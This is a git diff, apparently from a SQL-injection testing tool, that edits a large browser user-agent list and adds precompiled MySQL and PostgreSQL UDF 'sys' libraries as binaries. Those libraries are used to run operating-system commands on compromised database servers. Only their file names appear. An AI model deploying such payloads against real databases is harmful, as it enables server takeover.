Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-TW; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 (.NET CLR 3.5.30729)
-Mozilla/5.0(Windows; U; Windows NT 7.0; rv:1.9.2) Gecko/20100101 Firefox/3.6
+Mozilla/5.0 (Windows; U; Windows NT 7.0; rv:1.9.2) Gecko/20100101 Firefox/3.6
Mozilla/5.0 (Windows; U; WinNT4.0; de-DE; rv:1.7.5) Gecko/20041108 Firefox/1.0
Mozilla/5.0 (Windows; U; WinNT4.0; de-DE; rv:1.7.6) Gecko/20050226 Firefox/1.0.1
Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
@@ -1385,7 +1381,6 @@ Mozilla/5.0 (X11; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0
Mozilla/5.0 (X11; Linux i686; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0
Mozilla/5.0 (X11; Linux i686; U; pl; rv:1.8.1) Gecko/20061208 Firefox/2.0.0
-Mozilla/5.0 (X11; Linux ppc; rv:5.0) Gecko/20100101 Firefox/5.0
Mozilla/5.0 (X11; Linux x86_64) Gecko Firefox/5.0
Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20110506 Firefox/4.0.1
Mozilla/5.0 (X11; Linux x86_64; rv:2.0b4) Gecko/20100818 Firefox/4.0b4
@@ -2209,13 +2204,6 @@ Mozilla/5.0 (X11; U; Linux i686; zh-TW; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04
Mozilla/5.0 (X11; U; Linux i686; zh-TW; rv:1.9.0.7) Gecko/2009030422 Ubuntu/8.04 (hardy) Firefox/3.0.7
Mozilla/5.0 (X11; U; Linux ia64; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3
Mozilla/5.0 (X11; U; Linux MIPS32 1074Kf CPS QuadCore; en-US; rv:1.9.2.13) Gecko/20110103 Fedora/3.6.13-1.fc14 Firefox/3.6.13
-Mozilla/5.0 (X11; U; Linux ppc64; en-US; rv:1.8.1.14) Gecko/20080418 Ubuntu/7.10 (gutsy) Firefox/2.0.0.14
-Mozilla/5.0 (X11; U; Linux ppc; da-DK; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)
-Mozilla/5.0 (X11; U; Linux ppc; en-GB; rv:1.9.0.12) Gecko/2009070818 Ubuntu/8.10 (intrepid) Firefox/3.0.12
-Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.7.12) Gecko/20051222 Firefox/1.0.7
-Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.3) Gecko/20070310 Firefox/2.0.0.3 (Debian-2.0.0.3-1)
-Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9.0.4) Gecko/2008111317 Ubuntu/8.04 (hardy) Firefox/3.0.4
-Mozilla/5.0 (X11; U; Linux ppc; fr; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12
Mozilla/5.0 (X11; U; Linux sparc64; en-US; rv:1.8.1.17) Gecko/20081108 Firefox/2.0.0.17
Mozilla/5.0 (X11; U; Linux x64_64; es-AR; rv:1.9.0.3) Gecko/2008092515 Ubuntu/8.10 (intrepid) Firefox/3.0.3
Mozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.0.4) Gecko/2008111318 Ubuntu/8.04 (hardy) Firefox/3.0.4
@@ -2547,7 +2535,6 @@ Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.6) Gecko/20070819 Firefox/2.0
Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.7) Gecko/20070930 Firefox/2.0.0.7
Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20
Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.2.8) Gecko/20101230 Firefox/3.6.8
-Mozilla/5.0 (X11; U; OpenBSD ppc; en-US; rv:1.8.0.10) Gecko/20070223 Firefox/1.5.0.10
Mozilla/5.0 (X11; U; OpenBSD sparc64; en-AU; rv:1.8.1.6) Gecko/20071225 Firefox/2.0.0.6
Mozilla/5.0 (X11; U; OpenBSD sparc64; en-CA; rv:1.8.0.2) Gecko/20060429 Firefox/1.5.0.2
Mozilla/5.0 (X11; U; OpenBSD sparc64; en-US; rv:1.8.1.6) Gecko/20070816 Firefox/2.0.0.6
@@ -3452,16 +3439,6 @@ Mozilla/4.0 (compatible; MSIE 4.01; Windows 98; DigExt)
Mozilla/4.0 (compatible; MSIE 4.01; Windows 98; Hotbar 3.0)
Mozilla/4.0 (compatible; MSIE 4.01; Windows CE)
Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC)
-Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320; PPC)
-Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320; Sprint:PPC-6700; PPC; 240x320)
-Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone; 176x220)
-Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Sprint;PPC-i830; PPC; 240x320)
-Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Sprint:PPC-i830; PPC; 240x320)
-Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Sprint:SCH-i320; Smartphone; 176x220)
-Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Sprint; SCH-i830; PPC; 240x320)
-Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Sprint:SCH-i830; PPC; 240x320)
-Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Sprint:SPH-ip320; Smartphone; 176x220)
-Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Sprint:SPH-ip830w; PPC; 240x320)
Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)
Mozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)
@@ -3597,7 +3574,6 @@ Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1)
Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
Mozilla/4.0 (MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (MSIE 6.0; Windows NT 5.1)
-Mozilla/4.0 PPC (compatible; MSIE 4.01; Windows CE; PPC; 240x320; Sprint:PPC-6700; PPC; 240x320)
Mozilla/4.0 WebTV/2.6 (compatible; MSIE 4.0)
Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
@@ -3605,8 +3581,6 @@ Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 5.2)
Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)
Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Mozilla/4.0 (X11; MSIE 6.0; i686; .NET CLR 1.1.4322; .NET CLR 2.0.50727; FDM)
-Mozilla/45.0 (compatible; MSIE 6.0; Windows NT 5.1)
-Mozilla/4.79 [en] (compatible; MSIE 7.0; Windows NT 5.0; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)
Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
@@ -3809,7 +3783,6 @@ Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; sv-se) AppleWebKit/525.18 (KHTM
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; sv-se) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; tr) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_2; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18
-Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_2; en-gb) AppleWebKit/526+ (KHTML, like Gecko) Version/3.1 iPhone
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_2; en-gb) AppleWebKit/526+ (KHTML, like Gecko) Version/3.1 Safari/525.9
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_3; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_3; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20
@@ -4209,4 +4182,93 @@ Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN) AppleWebKit/533+ (KHTML, like Ge
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-HK) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-TW) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Mozilla/5.0 (X11; U; Linux x86_64; en-ca) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+
-Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+
\ No newline at end of file
+Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+
+
+# https://techblog.willshouse.com/2012/01/03/most-common-user-agents/ (Note: Updated December 28th 2020)
+
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15
+Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
+Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
+Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15
+Mozilla/5.0 (X11; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
+Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66
+Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:83.0) Gecko/20100101 Firefox/83.0
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 OPR/72.0.3815.400
+Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
+Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.47
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.55
+Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36
+Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.52
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
+Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 OPR/72.0.3815.400
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:84.0) Gecko/20100101 Firefox/84.0
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
+Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
+Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:83.0) Gecko/20100101 Firefox/83.0
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 OPR/72.0.3815.320
+Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
+Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
+Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
+Mozilla/5.0 (X11; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0
+Mozilla/5.0 (Linux; U; Android 4.3; en-us; SM-N900T Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
+Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
+Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 OPR/73.0.3856.284
diff --git a/data/txt/wordlist.tx_ b/data/txt/wordlist.tx_
new file mode 100644
index 00000000000..f2b52c90658
Binary files /dev/null and b/data/txt/wordlist.tx_ differ
diff --git a/udf/README.txt b/data/udf/README.txt
similarity index 100%
rename from udf/README.txt
rename to data/udf/README.txt
diff --git a/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ b/data/udf/mysql/linux/32/lib_mysqludf_sys.so_
new file mode 100644
index 00000000000..bfd4440ba5f
Binary files /dev/null and b/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ differ
diff --git a/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ b/data/udf/mysql/linux/64/lib_mysqludf_sys.so_
new file mode 100644
index 00000000000..1992ed0347e
Binary files /dev/null and b/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ differ
diff --git a/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ b/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
new file mode 100644
index 00000000000..bb8ec366d4c
Binary files /dev/null and b/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ differ
diff --git a/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ b/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
new file mode 100644
index 00000000000..97799b69d4d
Binary files /dev/null and b/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ differ
diff --git a/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..33dbdeeb35b
Binary files /dev/null and b/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..c56d766209a
Binary files /dev/null and b/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..3fb236e2644
Binary files /dev/null and b/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..d734fff00ae
Binary files /dev/null and b/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..da50fa8eafc
Binary files /dev/null and b/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..83732d33298
Binary files /dev/null and b/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..ee1ca8ccef1
Binary files /dev/null and b/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..ab7e7456223
Binary files /dev/null and b/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..5314a0a3886
Binary files /dev/null and b/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..da9d0a7f6f7
Binary files /dev/null and b/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..1100ab820fd
Binary files /dev/null and b/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..f9396a86aa5
Binary files /dev/null and b/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..21bbddcf59e
Binary files /dev/null and b/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..9327b1cdba3
Binary files /dev/null and b/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..a9874449464
Binary files /dev/null and b/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..e4b124fc8b3
Binary files /dev/null and b/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..2c22afae9a2
Binary files /dev/null and b/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..ab23ee6a749
Binary files /dev/null and b/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..8dae29c8336
Binary files /dev/null and b/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..e5d05fc6f16
Binary files /dev/null and b/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ differ
